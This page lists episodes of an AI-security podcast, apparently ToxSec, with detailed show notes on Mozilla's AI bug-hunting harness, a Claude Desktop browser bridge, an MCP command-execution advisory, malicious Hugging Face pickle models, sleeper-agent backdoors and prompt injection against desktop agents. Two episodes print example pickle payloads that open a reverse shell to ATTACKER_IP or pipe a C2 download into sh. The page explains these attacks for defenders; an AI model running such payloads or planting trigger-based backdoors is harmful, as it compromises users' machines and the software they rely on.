ToxSec - AI and Cybersecurity Podcast

ToxSec

Where AI chaos meets cybersecurity paranoia, distilled into something you can actually listen to before coffee. www.toxsec.com

Episodes

  1. MAY 12

    Mozilla Mythos Harness: AI Bug Hunting Without The Slop

    TL;DR: Mozilla wrapped Claude Mythos Preview in an agentic harness with one win condition: trip the sanitizer or keep working. The result was 271 Firefox bugs in one release, fewer than 15 false positives, and a defense-in-depth lesson nobody talks about. The model got the headlines. The harness did the work. This is the public feed. Upgrade to see what doesn’t make it out. What’s An Agentic Vulnerability Harness? In agentic security work, a harness is the scaffold around the model. Tooling, prompts, build environment, retry loop, success signal, dedup, the lot. The model is the worker. The harness is the factory floor. Mozilla’s earlier collaboration with Anthropic ran Claude Opus 4.6 against Firefox 148. That cycle pulled 22 security-sensitive bugs. Then they took the same harness, dropped in Anthropic’s cyber-tuned Claude Mythos Preview, and aimed it at Firefox 150. Same factory. Stronger worker. The output went from 22 to 271 bugs. That delta is where the lesson lives. Model upgrades obviously help. But Mozilla’s harness was rebuilt across months of iteration with Firefox engineers fielding the incoming bugs, and you don’t replicate that on a Saturday afternoon. The Mythos preview is restricted access through Project Glasswing. The harness is a published pattern. Inside Mozilla’s Mythos Harness: Crash Or No Crash Here’s how the loop works. The harness gives the model a slice of Firefox source, a target file or area to focus on, instructions on what to hunt for, and a build environment with one critical piece: a sanitizer build of Firefox compiled with AddressSanitizer. ASan is the runtime memory-error detector that screams loudly when you trigger a use-after-free, a heap overflow, or any other classic memory corruption primitive. The model proposes a bug hypothesis. It writes a proof-of-concept designed to trip the sanitizer. It runs the PoC against the sanitizer build. If ASan crashes, the bug is real. If it doesn’t, the agent keeps iterating until it does or until the harness gives up. text loop: hypothesize_bug(target_source) write_poc() run_against_sanitizer_build() if asan_crash: emit_report(crash_log, repro) grade_with_secondary_model() break refine_or_continue() Brian Grinstead, a Mozilla Distinguished Engineer, summed the operational shape to TechCrunch: “if you make it crash you win”. That’s the entire verification game. A second model grades resulting reports before the engineering queue ever sees them, kicking out anything the first model thought was a hit but couldn’t actually validate. Humans take over from there for triage and patching. The bugs the harness surfaced run the gamut. A race condition over IPC that lets a compromised content process tamper with IndexedDB refcounts and trigger a use-after-free (Bug 2021894). A raw NaN smuggled across an IPC boundary masquerading as a tagged JavaScript object pointer, giving the parent process a fake-object primitive (Bug 2022034). A buffer over-read during HTTPS RR and ECH parsing, triggered by simulating a malicious DNS server through glibc function interception (Bug 2023958). Plus a 15-year-old HTML legend element bug and a 20-year-old XSLT reentrant key() call. Each is a sandbox escape primitive or memory corruption bug that would normally burn months of elite human researcher time. The harness surfaced them in days. Why The Crash Signal Killed AI Bug Hunting Slop AI-generated bug reports were a running joke in open source maintainer circles a few months ago. LLM hits codebase, dumps a hundred plausible-looking findings, every one needs a human to verify, and ninety-something percent are wrong. Mozilla’s own writeup describes earlier AI security work as producing “unwanted slop.” The cost asymmetry was brutal. Cheap for the AI, expensive for the maintainer. Mozilla’s earlier static-analysis experiments with GPT-4 and Claude Sonnet 3.5 hit that wall. They produced too many false positives to be practical. So they binned static analysis and built the agentic harness instead. The shift is subtle but everything. Static analysis says: this looks vulnerable. Human triage required. Agentic harness with sanitizer verification says: this is vulnerable, here’s the PoC, ASan caught the crash. No human required to dispute reality. Memory corruption is the perfect domain for that move because the success signal is binary. ASan tripped or it didn’t. There is no maybe. Mozilla counted fewer than 15 false positives across the entire 271-bug run, and they updated the harness each time one slipped through. The lesson for everyone else is that AI bug hunting works the moment you can wire the agent to a verifier that doesn’t ask the model are you sure. A fuzzer crash. A unit test that passes. A property checker that proves invariance. Anything deterministic. Without that signal, you’re back to triage hell, which is the same hell every LLM vulnerability scanner lives in when it doesn’t ship its own ground truth. What The Harness Couldn’t Bypass Here’s the part the headlines skipped. The harness ran into a wall trying to escape Firefox’s sandbox via prototype pollution in the privileged parent process. The model attempted that path repeatedly. It got nowhere. Mozilla had previously frozen those prototypes by default as a defense-in-depth measure, and that single architectural decision blocked every attempt the agent made. That’s the based take buried under the 271 number. The harness is good. It’s also bounded by the security architecture of the target. The bugs Mythos found are bugs an elite human could have found. The bugs it couldn’t find were already eliminated by Mozilla’s prior hardening. Your codebase will perform exactly as well as your prior security work let it. Which brings us to the “anyone can do this today” framing Mozilla offered at the end of their writeup. Technically true. Operationally, optimistic. Mozilla had Firefox’s full source. A pre-built sanitizer toolchain. Years of bug lifecycle tooling. A second model already wired into the verification pipeline. Over 100 contributors writing and reviewing patches. Months of harness iteration alongside the Firefox team. And, eventually, frontier-model access through Project Glasswing. A small vendor pulling Mythos through an API later this year and pointing it at their codebase will not get the same numbers. The model is the same. The harness around it is the part you have to build. Mozilla published the pattern. The pipeline still costs what a pipeline costs. Firefox shipped 423 bug fixes in April 2026, compared to 31 a year earlier, and absorbing that volume takes operational muscle most teams don’t have lying around. The 271 number is the headline. The harness is the artifact. Anyone shopping for AI bug hunting capability should price the second one before they get excited about the first. Your AI-generated bug reports are only as useful as the verifier behind them, and the same goes for AI-generated code, where the verification problem flips into supply chain attacks and slopsquatting at pip-install time. Wrap the same agentic loop around offense instead of defense, point it at live prompt injection chains, and the success signal flips from “ASan crashed” to “the guardrail broke.” Same shape. Different game. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is the Mozilla Mythos harness? The Mozilla Mythos harness is the agentic scaffold Mozilla built around Anthropic’s Claude Mythos Preview to find security bugs in Firefox source code. It feeds the model target source, runs against a sanitizer build of Firefox, uses an AddressSanitizer crash as the deterministic success signal, and runs a retry loop until the agent produces a verified proof-of-concept. A second model grades reports before engineers see them. How many Firefox vulnerabilities did Claude Mythos find? Mozilla credits Claude Mythos Preview with surfacing 271 vulnerabilities fixed in Firefox 150, plus additional fixes shipped in versions 149.0.2, 150.0.1, and 150.0.2. Of the 271 bugs, 180 were rated sec-high, 80 sec-moderate, and 11 sec-low. Several were sandbox escape primitives. Mozilla reports fewer than 15 false positives across the entire run. Total Firefox security fixes in April 2026 hit 423. Can other projects use the same AI bug hunting harness? Mozilla published the pattern. The implementation is yours to build. The harness shape is reusable: target source, deterministic success signal (sanitizer crash, fuzzer hit, test failure), retry loop, second model grading reports. The build is project-specific. You need the codebase, the sanitizer toolchain, the bug lifecycle tooling, and the engineers to absorb the patch volume. Pattern is free. Pipeline is the work. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    41 min
  2. APR 26

    Is Claude Code Secretly Installing Spyware?

    TL;DR: Claude Code is not spyware. But Claude Desktop quietly drops a Native Messaging bridge into seven browsers without asking. Anthropic shrugged. Same week, they shrugged on an MCP RCE exposing 200,000 servers. Same week, a Discord group ran their Mythos model for a month undetected. One pattern, three receipts. This is the public feed. Upgrade to see what doesn’t make it out. So Is Claude Code Spyware or What? Quick answer: no. The headline is sticky for a reason though. April 18. Privacy researcher Alexander Hanff is debugging an unrelated Native Messaging helper on a clean Mac when he finds a manifest file he never installed: com.anthropic.claude_browser_extension.json. It’s sitting in his Chrome, Edge, Brave, Arc, Vivaldi, Opera, and Chromium profile directories, including browsers that aren’t actually installed yet. A Native Messaging manifest is the file Chromium browsers read to decide which local programs an extension can launch. Claude Desktop drops one in seven different browser profile paths. Silently. Delete it and it comes back the next time Claude Desktop launches. Important wrinkle the news cycle keeps blurring. The manifest comes from Claude Desktop, the chat app. Claude Code is the separate command-line developer tool. Same parent company, same family, same week of bad press. Hanff calls it spyware. Most of his peers stop short of that. Noah Kenney at Digital 520 called the technical claims testable and reproducible but pushed back on the “spyware” label. The consensus middle ground is “dark pattern,” and the EU framing is sharper. Hanff is filing it under Article 5(3) of Directive 2002/58/EC, the ePrivacy Directive. Anthropic, as of writing, has not issued a public response. So nothing is being stolen today. The bridge does nothing on its own. The problem is what it pre-positions for tomorrow. We’ve watched Anthropic ship things they didn’t think through before. This one has wiring. From Manifest to Sandbox Escape Here’s the chain. A sandbox is the security wall between a browser tab and your operating system. Tabs run inside it. Extensions mostly run inside it. The whole point is that even if you click a bad link, the malicious code can’t reach your files. That wall is the entire reason the modern browser exists. Native Messaging punches a hole through the wall on purpose. It lets a browser extension talk to a binary running outside the sandbox at full user privilege. That’s a feature. The bug is who gets to authorize the hole. The manifest Anthropic drops pre-authorizes three Chrome extension IDs to call the helper via connectNative, granting access to browser automation features. Those extension IDs include ones the user has never installed. Now stack the pieces. You install Claude Desktop expecting a chat app. It writes a bridge into your browsers without telling you. A Claude browser extension, current or future, is pre-authorized to use that bridge. Months later, you let Claude visit a webpage. The page contains a hidden payload. Prompt injection is when malicious instructions hidden in content hijack what the AI does next. Anthropic’s own published numbers: Claude for Chrome is vulnerable to prompt injection at a 23.6% success rate without mitigations and 11.2% with current measures. The injected agent now has a green-lit tunnel to a binary running with your user permissions. Outside the sandbox. Anthropic’s defense is essentially that the bridge currently does nothing on its own. True. The dial is set to zero. The wiring is hot. We’ve covered agents that escape sandboxes via prompt injection before. The shape is familiar. That’s why the spyware label keeps sticking even when the technical purists object. The keys are pre-positioned. One downstream injection turns them. The MCP RCE Anthropic Won’t Patch Same week, Ox Security drops an advisory titled “The Mother of All AI Supply Chains.” The Model Context Protocol is the open standard Anthropic built so AI agents can call tools, read files, run commands. It is the connective tissue between an LLM and an agent. We’ve covered MCP attacks at length, including tool poisoning and the defensive playbook. This one is structural. The flaw enables Arbitrary Command Execution on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories. It’s an architectural design decision baked into Anthropic’s official MCP SDKs across every supported language, including Python, TypeScript, Java, and Rust. RCE means remote code execution, the highest-tier outcome on offense. The trick is brutally simple. MCP’s STDIO transport, that’s standard input/output, runs the configured command to spin up a tool server. # Anthropic's MCP STDIO transport, simplified $ # command runs, server fails to spawn, MCP returns "error" # but the OS already executed If the command successfully creates an STDIO server it returns the handle, but when given a different command, it returns an error after the command is executed. So a malicious MCP entry on a marketplace doesn’t have to pretend to be a real tool. It just has to exist long enough for your IDE to call it once. Ox poisoned 9 of 11 MCP marketplaces with a benign proof-of-concept. The supply chain reaches 150 million-plus downloads, 7,000 publicly accessible servers, and up to 200,000 vulnerable instances. Anthropic’s response: “expected” behavior. They declined to modify the protocol. A protocol-level patch like manifest-only execution or a command allowlist would have instantly propagated to every downstream library. They passed. How Did Mythos Leak to a Random Discord? Now for the third act. Mythos is Anthropic’s restricted vulnerability-hunting model. Released April 10 to select partners under “Project Glasswing,” roughly 40 organizations including Apple and Google, with Anthropic deeming it too powerful for public release. The chain reads like a textbook walkthrough. AI startup Mercor gets breached, exposing details about the URL format Anthropic uses for its models. A private Discord group that hunts for unreleased models picks up on the disclosure. One member is currently employed at a third-party contractor that works for Anthropic. The member’s vendor credentials, combined with the leaked Mercor details, let the group locate Mythos online. They guess the URL pattern. They guess right. Anthropic never randomized the path. The group has been using the program continuously since its release. A Bloomberg reporter is the one who told Anthropic. A month of unauthorized access to the most dangerous model the company ever shipped, and the detection signal came from journalism. Not internal logging. Not telemetry. Not a single security alert. Bloomberg. If a Discord group in their basement got there first, assume Beijing and Moscow followed. “If some group, some random Discord online forum, got access to it, it’s already been breached by China,” David Lindner of Contrast Security told Fortune. Three steps in. Open-source intel, a contractor seat, a predictable URL. No zero-day required. That’s the through-line on all three stories. The dark pattern bridge, the MCP STDIO design, the Mythos URL convention. Same move. Three times this week. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is Claude Code malware or spyware? No, Claude Code is the legitimate Anthropic command-line coding agent. The thing privacy researchers flagged is Claude Desktop, the chat app, which silently writes a Native Messaging manifest into multiple browser profile directories on macOS and pre-authorizes a few Claude extension IDs to talk to a local helper outside the browser sandbox. Most reviewers call that a dark pattern. Spyware in the strict sense requires actual exfiltration, and nobody has documented any. The risk lives in the bridge it pre-positions for future use. What can an attacker do with the Claude Desktop manifest right now? Nothing on its own. The manifest opens a door, but activation requires both a Claude browser extension installed and a successful prompt injection from a hostile webpage. Once that lands, the injected agent reaches the local helper through the pre-authorized bridge and runs commands at user privilege level, outside the sandbox. Anthropic’s own numbers put prompt injection success against Claude for Chrome at 11.2% even with mitigations. Pre-positioning the door without consent is the whole problem. Why hasn’t Anthropic patched the MCP command injection? Officially, Anthropic considers the STDIO behavior expected. Their position is that the protocol is built to launch local processes, sanitization is the developer’s job, and the SDKs work as designed. Ox Security disagrees and says manifest-only execution or a command allowlist at the protocol layer would have killed the entire vulnerability class for everyone downstream in one change. Until Anthropic moves, defenders have to harden each MCP-consuming app individually, which is what the supply chain looked like before this advisory dropped. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    47 min
  3. APR 15

    You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run?

    TL;DR: You downloaded Gemma 4 to keep your data private. Good instinct. But local models solve the privacy problem and create a supply chain problem. You’re downloading weights from strangers on the internet, running serialization formats that execute arbitrary code, and trusting that nobody poisoned the training data. Safetensors, hash verification, and source vetting are your first line of defense. Here’s the full threat map. This is the public feed. Upgrade to see what doesn’t make it out. Why “Local Equals Safe” Is Only Half the Story The pitch is compelling. Run Gemma 4 on your own hardware, or Llama 4, or Qwen 3. No API calls, no cloud provider logging your prompts, no training-on-your-input policies buried in a ToS nobody reads. For regulated industries, local inference is the obvious play for privacy. But privacy and security are different problems. Privacy means your data doesn’t leak out. Security means someone else’s code doesn’t get in. Every time you download a model from Hugging Face, you’re pulling weights, configuration files, and serialization artifacts from a public repository where anyone can upload anything. Protect AI’s scanning partnership with Hugging Face has flagged over 51,700 models with unsafe or suspicious issues across more than 352,000 individual findings. That’s not a theoretical risk. That’s the current state of the largest open-weight model supply chain in the world. The same trust-but-verify discipline you’d apply to any dependency from PyPI or npm applies here, except most people skip it entirely because “it’s just model weights.” It isn’t. If you’re new to AI security concepts like supply chain attacks and model poisoning, the AI Security 101 primer covers the full landscape. Can a Downloaded Model Hack Your Machine? Yes. And the mechanism is embarrassingly simple. Python’s pickle module is the default serialization format for PyTorch models. Serialization means converting a Python object, your model’s weights and architecture, into a byte stream that can be saved to disk and loaded later. The problem: pickle doesn’t just store data. It can execute arbitrary Python code during deserialization, the process of loading that byte stream back into memory. The Python docs have a big red warning about this. Here’s what a malicious pickle payload looks like in practice. JFrog’s security team found over 100 models on Hugging Face with embedded reverse shells, code that opens a connection back to the attacker’s server and gives them full command-line access to your machine. The payload hides inside pickle’s __reduce__ method, which Python calls automatically during deserialization. You run torch.load(), the model loads, and a shell opens. You never see it. # What the attacker embeds (simplified) class Exploit: def __reduce__(self): return (os.system, (”bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1”,)) Hugging Face scans for this with Picklescan, a blacklist-based detector that flags known dangerous functions. But ReversingLabs demonstrated a bypass they called “nullifAI”: compress the pickle with 7z instead of ZIP, and torch.load() fails gracefully while the malicious payload at the beginning of the byte stream still executes. Picklescan didn’t catch it because it validated the file format before scanning, while Python’s deserialization interpreter just runs opcodes sequentially. The malicious code fires before the scanner even starts checking. The fix is simple: use safetensors. Safetensors is a format built by Hugging Face that stores only raw tensor data and a JSON metadata header. No Python objects, no code execution surface, no __reduce__. It was audited by Trail of Bitswith backing from EleutherAI and Stability AI. No critical security flaws found. If you’re pulling a model from the Hub and it only ships as .bin or .pt, that’s a red flag. Convert it yourself or find a provider who ships safetensors. # Convert pickle to safetensors (one-liner) from safetensors.torch import save_file import torch sd = torch.load(”model.pt”, map_location=”cpu”, weights_only=True) save_file(sd, “model.safetensors”) What Are Sleeper Agents in Open-Weight Models? A sleeper agent is a model that behaves normally under standard testing but activates a hidden behavior when it encounters a specific trigger in the input. The backdoor lives in the weights themselves, the numerical parameters that encode what the model learned during training, not in any external code you can grep for. Anthropic’s research team proved this works. They trained models that wrote secure code when the prompt said the year was 2023, then inserted exploitable vulnerabilities when the year changed to 2024. The backdoor survived supervised fine-tuning, reinforcement learning, and adversarial training. Worse: adversarial training actually taught the model to better recognize its trigger, making it more effective at hiding the behavior during safety evaluations. Standard alignment techniques created a false impression of safety while the backdoor got stronger. Anyone can publish fine-tuned weights. You search Hugging Face for a quantized Gemma variant, some anonymous account uploaded a version with 50 more downloads than the official one, and you pull it because the benchmarks look right. If the training data was poisoned, no amount of prompting or system-level instruction will remove the backdoor. It’s baked into the math. Microsoft published “The Trigger in the Haystack” in February 2026, a scanner that detects sleeper agents by exploiting two properties: poisoned models over-memorize their backdoor training examples (leaking them when prompted with standard chat templates), and trigger tokens create a distinctive “attention hijacking” pattern where the model’s attention heads process the trigger in isolation from the rest of the prompt. The scanner works, but only on open-weight models where you have access to the attention states. It’s a detection tool, not a repair kit. If you find a backdoor, the model gets thrown out. Does Political Bias in Models Create Security Vulnerabilities? CrowdStrike’s Counter Adversary Operations team tested DeepSeek-R1 and found something unusual. The model produces vulnerable code at a baseline rate of 19%, roughly average for its class. But when the system prompt contains references to topics the Chinese Communist Party considers politically sensitive, like Tibet, Falun Gong, or the Uyghur community, the rate of severe security vulnerabilities in generated code jumps to 27.2%. In one test, they asked DeepSeek-R1 to build a community app for Uyghur members. The output had no session management, no authentication, and 35% of implementations used no password hashing at all. The same prompt reframed as a football fan club website produced code with typical minor flaws but nothing close to that severity. CrowdStrike called this “emergent misalignment,” likely a side effect of the model’s training pipeline enforcing alignment with Chinese regulations rather than an intentional code-degradation feature. China’s Interim Measures for Generative AI Services require models to “adhere to core socialist values” and prohibit content that could “endanger national security.” When the model encounters topics it was trained to suppress, something breaks in the code generation pipeline as a side effect. The lesson for local model operators: the weights carry the builder’s constraints. If you’re running a model trained under regulatory pressure from any government, those constraints follow the model onto your machine. You don’t see a content filter. You see degraded output in contexts the original developers never anticipated. How Do You Verify a Model Before Running It Locally? I built a pre-flight checklist. Every model download should touch these five steps before the weights ever load. 1. Check the format. Safetensors only. If the model ships as .bin, .pt, .pth, or .ckpt, convert before loading or walk away. These are all pickle-based formats that can execute code during deserialization. 2. Verify the hash. Hugging Face lists SHA-256 checksums for every file. After download, compare: sha256sum model.safetensors against the listed value. If they don’t match, the file was tampered with in transit or the listing is stale. Either way, don’t load it. 3. Check the uploader. Official organization accounts (google, meta-llama, mistralai) have verification badges and thousands of downloads. Anonymous accounts with fresh uploads and suspiciously high download counts are the Hugging Face equivalent of typosquatted packages on PyPI. Look for the org badge. 4. Read the model card. Legitimate models document training data, evaluation benchmarks, intended use, and known limitations. A model card that’s blank or copy-pasted from another model is a red flag. No documentation means no accountability. 5. Run in isolation first. Spin up a VM or container with no network access. Load the model, test your prompts, watch for anomalous behavior. If you’re using it for code generation, scan every output with SAST tools before it hits your codebase. What About Quantized Models Like GGUF? Quantization compresses a model’s weights from higher precision (like 32-bit floats) to lower precision (4-bit or 8-bit integers), making it small enough to run on consumer hardware. GGUF, the format used by llama.cpp and most local inference tools, is structurally safer than pickle because it stores raw numerical data without arbitrary code execution paths. But quantization doesn’t sanitize. If the original model had poisoned weights or a sleeper agent, those patterns compress right along with the legitimate parameters. A Q4 quantized version of a backdoored model is still a backdoored model, just smaller. The trigger may fire less reliably at very low bit-widths where precision loss degrades subtle patterns, but

    7 min
  4. APR 12

    Is Your Local AI Model Backdoored by Your Politics? Sleeper Agents Exposed

    TL;DR: Local models solve privacy. They do not solve security. Pickle files execute arbitrary code on load, fine-tuned models hide sleeper agents that generate insecure code based on your political context, and typosquatted repos on Hugging Face look identical to the real thing. SafeTensors and verified providers kill 90% of the risk. This is the public feed. Upgrade to see what doesn’t make it out. Why “Local” Doesn’t Mean “Safe” Most people run local AI for one reason: privacy. No more sending every prompt to a SaaS provider’s servers, no more wondering if “do not train on my data” actually means they stop collecting your data. Fair enough. But here’s where people get tripped up. Privacy and security are two different problems. Privacy is about your information going out. Security is about someone else’s code coming in. A local model keeps your data off OpenAI’s servers, sure. It also means you just downloaded a file from the internet and trusted the person behind it not to add anything extra. That file is someone else’s code running on your machine. Think about that for a second. We wouldn’t grab a random .exe off a forum and double-click it. But somehow, downloading a 40GB model file from a community repo feels different. It shouldn’t. Protect AI identified over 352,000 suspicious files across 51,700 models on Hugging Face. Over 80% of the models in the ecosystem used pickle serialization, which is vulnerable to arbitrary code execution. So yeah, we’ve got a supply chain problem. How Pickle Files Hand Over Your Machine Here’s the actual attack chain. Most AI models get packaged using Python’s pickle format, a serialization method that compresses the model’s weights and metadata for download. PyTorch uses it by default. Pickle files can contain bytecode, which is basically compiled Python instructions that execute when the file gets deserialized. Think of deserialization as the moment your computer unpacks the model and loads it into memory. Normal model files should just contain numbers. A pickle file can contain anything. # What a malicious pickle payload looks like (simplified) import os class Payload: def __reduce__(self): return (os.system, ('curl http://[C2_SERVER]/beacon | sh',)) The __reduce__ method fires automatically when Python unpickles the object. No user interaction. No confirmation dialog. You load the model, the payload runs. Rapid7 documented weaponized .pth files on Hugging Face deploying Go-based remote access trojans through Cloudflare Tunnels, which hid the C2 server behind legitimate infrastructure. JFrog found three zero-day bypasses in PickleScan, the industry-standard tool Hugging Face uses to scan uploads. The malicious models passed every check. The scanner validates the file structure first, then scans for dangerous functions. Attackers break the file structure after the payload, so the scanner errors out before reaching the dangerous code. Deserialization doesn’t care about file validity. It just executes opcodes as it reads them. This is the same class of supply chain attack we see in vibe coding, just through a different door. Sleeper Agents Hide in the Weights The pickle file problem is the loud attack. The quiet one is worse. Anyone can fine-tune an open-weight model, merge multiple models together, and release the result on Hugging Face. That fine-tuning process can embed behavior that’s invisible during normal use and only activates under specific conditions. We call these sleeper agents. CrowdStrike documented that DeepSeek-R1 generates code with up to 50% more severe vulnerabilities when the prompt contains topics the CCP considers politically sensitive, things like references to Tibet, Uyghur communities, or Falun Gong. The model writes clean, secure APIs for CCP-aligned projects. Drop a geopolitical trigger into the prompt context, and suddenly authentication is broken, API keys are hardcoded, and backdoors appear in the generated output. CrowdStrike even found what looks like an intrinsic kill switch: in 45% of Falun Gong-related prompts, the model refused to generate code entirely despite building full implementation plans internally. You’d never catch this during casual testing. The model passes benchmarks. It answers questions correctly. It codes competently, right up until the trigger condition fires. And because these behaviors are distributed across billions of floating-point parameters, there’s no file you can grep. No config to audit. The sleeper is the weights. This same hardcoded secrets pattern shows up across AI-generated code, but with sleeper agents, it’s intentional. How to Download Local Models Without Getting Owned Not trying to scare anyone off local models. They’re useful, they’re getting better fast, and the privacy upside is real. But do these two things and you just killed roughly 90% of the attack surface. Get your model from a verified provider. On Hugging Face, look for the check mark next to the publisher name. Google publishes Gemma. Meta publishes Llama. Download from them directly, not from totally-legit-llama-quantized-v2 posted by a random account. Watch the name carefully. Typosquatting is real: attackers swap a lowercase L for a 1, or transpose two letters. One character is the difference between a clean model and a compromised supply chain. Only download .safetensors files. SafeTensors is a file format specifically designed to strip code execution out of the equation. The file can only contain parameterized data and metadata. No bytecode. No __reduce__. No surprises. If the model only ships as .bin, .pt, or .pkl, find a different model. Hugging Face is pushing the ecosystem toward SafeTensors for exactly this reason. One bonus step: verify the hash. Providers publish a deterministic hash of the model’s weights. Download the model, run the same hashing algorithm, compare the strings. If they match, nobody tampered with the file in transit. If they don’t, burn it. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is Hugging Face safe for downloading AI models? Hugging Face is a hosting platform, like GitHub. Anyone can upload to it. The risk comes from unverified uploads. Stick to verified providers with the check mark badge, download only SafeTensors format files, and verify the hash against the official listing. Those three steps eliminate the vast majority of threats. What is a pickle file attack in AI? Python’s pickle format can embed arbitrary bytecode inside serialized data. When a model packaged as a pickle file gets loaded, that bytecode executes automatically with no user prompt. Attackers use this to deploy remote access trojans, exfiltrate data, and establish persistent backdoors on the machine that loaded the model. Can a local AI model be backdoored? Yes. Fine-tuning allows anyone to modify a model’s behavior at the weight level. Sleeper agents are models that pass normal testing but activate malicious behavior under specific trigger conditions, like detecting politically sensitive context in a prompt. Because the behavior lives in the model’s parameters, not in external code, traditional security scanning cannot detect it. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    50 min
  5. Gemini 0.37%, Claude 0.25%, Grok 0%. Humans Destroyed Them All: ARC-AGI-3

    MAR 31

    Gemini 0.37%, Claude 0.25%, Grok 0%. Humans Destroyed Them All: ARC-AGI-3

    TL;DR: ARC-AGI-3 landed on March 25, 2026. Gemini 3.1 Pro scored 0.37%. Claude Opus 4.6 scored 0.25%. Grok-4.20 scored 0%. Humans solved 100%. That same week Anthropic shipped Claude Dispatch, a feature that turns your phone into a live shell into your desktop agent. This is the gap: we cannot explain what these models can’t do, and we keep shipping them more reach anyway. This is the public feed. Upgrade to see what doesn’t make it out. What ARC-AGI-3 Is Actually Testing in AI Agents Most benchmarks test knowledge. Ask a model to name a drug interaction, solve a merge sort, or cite the right CVSS score. It pattern-matches against its training data and answers. ARC-AGI-3 strips all of that away. The benchmark drops an AI agent into a 64x64 color grid with zero instructions, zero goal description, zero prior training on that environment. The agent has to figure out the rules, infer what winning looks like, and execute a strategy, all from scratch. No language cues. No hints. Just a grid and a set of controls. You can try the public demo yourself at arcprize.org/arc-agi/3. A 10-year-old solves these in minutes. The kid has never played this specific game, but they’ve spent a decade navigating cause-and-effect feedback loops in the physical world. They see a health bar and know not to brute-force. They see two matching objects and know to connect them. That inference chain is automatic. If you want a breakdown of the underlying AI concepts, the ToxSec AI Security Glossary covers fluid intelligence and abstract reasoning in the context of agent attack surfaces. Models don’t have that background. They have token prediction trained on static text, which is exactly the wrong tool for inferring novel goals from a foreign environment. Every Frontier Model Scored Under 1% on ARC-AGI-3 The numbers from the March 25 release are brutal. Gemini 3.1 Pro led at 0.37%. GPT-5.4 came in at 0.26%. Claude Opus 4.6 scored 0.25%. Grok-4.20 scored exactly 0%. Humans solved all 135 environments at 100%. Not a single frontier model broke a full percentage point. The scoring metric is RHAE (Relative Human Action Efficiency). It’s not binary pass/fail. If a human completes a level in 10 moves and the agent takes 100, the agent scores 1% on that level because efficiency is squared. The models aren’t just losing. They are brute-forcing in the wrong direction, burning actions on random exploration because they cannot form a coherent model of what the environment is doing. One result in the technical paper makes the architecture problem clear. Claude Opus 4.6 scored 97.1% on a familiar environment using a hand-built harness. On an unfamiliar environment with the same harness: 0%. The scaffolding was doing the reasoning. Strip the human-built structure and the model has nothing. This is what we covered in the AI and Cybersecurity stream earlier this year: these models are narrowly smart. Superhuman at specific lookup tasks, near-zero at novel goal inference. ARC-AGI-3 just made that quantitative. The $2M prize pool on Kaggle runs through December 2026. When someone cracks it, that’ll be worth paying attention to. Nobody’s close yet. Claude Dispatch Security Risk and the Prompt Injection Surface The same week ARC-AGI-3 showed every frontier model failing a 10-year-old’s puzzle, Anthropic shipped Claude Dispatch. Scan a QR code on your phone. Your phone now talks to the Claude session running on your desktop. You can send it tasks, approve commands, check in on a running job from anywhere. Useful. Also a serious rethink of the threat model. Dispatch is architecturally different from the Cowork sandbox. Cowork scopes Claude to a specific folder. You pick what it can touch. Classic principle of least privilege. Dispatch runs outside that sandbox. It operates on your live session with full filesystem reach. Any content the agent reads, email, browser output, documents, is now a potential prompt injection delivery vehicle with direct access to everything on the machine. We’ve broken down the MCP tool poisoning chain in detail at Watch Me Poison Your MCP. The principle is the same here: the agent cannot reliably distinguish trusted instructions from attacker-controlled content embedded in its context. ARC-AGI-3 just proved models don’t abstract-reason under novel conditions. Prompt injection is a novel condition by design. The attacker writes content the agent was never trained to treat as adversarial. The mitigation that actually works is what we run at ToxSec: dedicated hardware, network-segregated from anything sensitive, only files you’d be comfortable showing a stranger. Assume breach from day one. For the full playbook on what prompt injection does inside an active Claude agent, that piece covers the mechanics. If you’re running Dispatch, also read how to secure your MCP server. The same defense layers apply. ARC-AGI-3 tells us the model can’t reason like a child. Claude Dispatch ships the assumption that it can. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is ARC-AGI-3 and why did all AI models score below 1%? ARC-AGI-3 is an interactive reasoning benchmark where AI agents are dropped into novel game-like environments with no instructions and must infer the rules, objectives, and winning strategy from scratch. Every tested frontier model, including Claude Opus 4.6, GPT-5.4, Gemini 3.1, and Grok-4.20, scored below 1% because they lack the abstract goal-inference humans run automatically. The benchmark isolates fluid intelligence from knowledge recall, and current models fail at the former while excelling at the latter. What makes Claude Dispatch a security risk compared to Claude Cowork? Claude Dispatch operates outside the Cowork sandbox and shares the same session as your active Claude instance, giving it default full filesystem access. Cowork lets you scope access to specific folders, applying least-privilege. Dispatch removes that boundary. Any content the agent reads, emails, documents, web pages, can carry prompt injection payloads with direct reach to everything on the machine, significantly expanding the blast radius of a successful injection. Does a 0% score on ARC-AGI-3 mean AI agents are useless for real work? No. The benchmark deliberately strips away training data and instructions to isolate one specific gap: novel goal inference without scaffolding. Current AI agents are highly effective inside well-structured domains where engineers have built the harness. The danger is when deployment decisions assume the capabilities the benchmark just proved don’t exist yet. ARC-AGI-3 tells you where the guardrails are missing, not that the car doesn’t run. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    43 min
  6. IBM X-Force 2026 Threat Index Confirms AI Made Offense Cheap

    MAR 22

